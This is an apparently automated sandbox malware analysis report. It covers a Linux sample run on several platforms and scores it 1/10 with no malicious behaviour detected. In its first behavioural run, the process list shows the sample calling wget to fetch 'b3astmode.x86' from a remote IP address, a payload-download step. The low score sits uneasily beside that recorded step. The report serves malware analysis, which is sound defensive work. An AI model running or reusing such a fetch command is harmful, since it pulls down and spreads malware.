Malware Analysis Report

2024-10-10 11:10

Sample ID 240614-t5eyssscrl
Target aab708c1db646958108adb13f3773cf5_JaffaCakes118
SHA256 cc818c82d0aed933567d0e606dcbfd7e00a70d3b12f611b5b6732a5900627499
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

cc818c82d0aed933567d0e606dcbfd7e00a70d3b12f611b5b6732a5900627499

Threat Level: No (potentially) malicious behavior was detected

The file aab708c1db646958108adb13f3773cf5_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-14 16:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 16:38

Reported

2024-06-14 16:40

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

130s

Max time network

146s

Command Line

[/tmp/aab708c1db646958108adb13f3773cf5_JaffaCakes118]

Signatures

N/A

Processes

/tmp/aab708c1db646958108adb13f3773cf5_JaffaCakes118

[/tmp/aab708c1db646958108adb13f3773cf5_JaffaCakes118]

/usr/bin/wget

[wget http://37.49.226.162/beastmode/b3astmode.x86]

Network

Country Destination Domain Proto
NL 37.49.226.162:80 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.5:443 tcp
NL 37.49.226.162:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 16:38

Reported

2024-06-14 16:40

Platform

debian9-armhf-20240611-en

Max time network

149s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
NL 37.49.226.162:80 tcp
NL 37.49.226.162:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 16:38

Reported

2024-06-14 16:38

Platform

debian9-mipsbe-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-14 16:38

Reported

2024-06-14 16:38

Platform

debian9-mipsel-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A